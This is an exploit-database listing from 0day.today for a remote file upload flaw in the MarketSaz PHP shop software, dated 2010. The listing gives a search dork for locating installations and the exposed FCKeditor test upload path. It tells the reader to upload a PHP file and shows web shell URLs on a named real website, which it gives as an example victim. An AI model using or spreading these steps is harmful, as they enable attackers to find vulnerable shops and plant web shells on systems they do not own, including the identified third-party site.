[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MarketSaz remote file Upload Vulnerability

Author
NetQurd
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12768
Category
web applications
Date add
18-06-2010
Platform
php
==========================================
MarketSaz remote file Upload Vulnerability
==========================================


#Exploit Title: MarketSaz remote file uploade

#Author: NetQurd (NetQurd@Live.com)

#Dork : English = Powered MarketSaz


#Software Link:  http://www.marketsaz.com

#Platform :linux/php

#Exploit : http://target.com

#http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

#Example site: http://www.langarshop.ir

#Select the "File Upload" To use = php

#http://www.langarshop.ir/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

#Sh3ll : http://www.langarshop.ir/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php

#OR

#http://www.langarshop.ir/shell.php



#  0day.today [2024-11-15]  #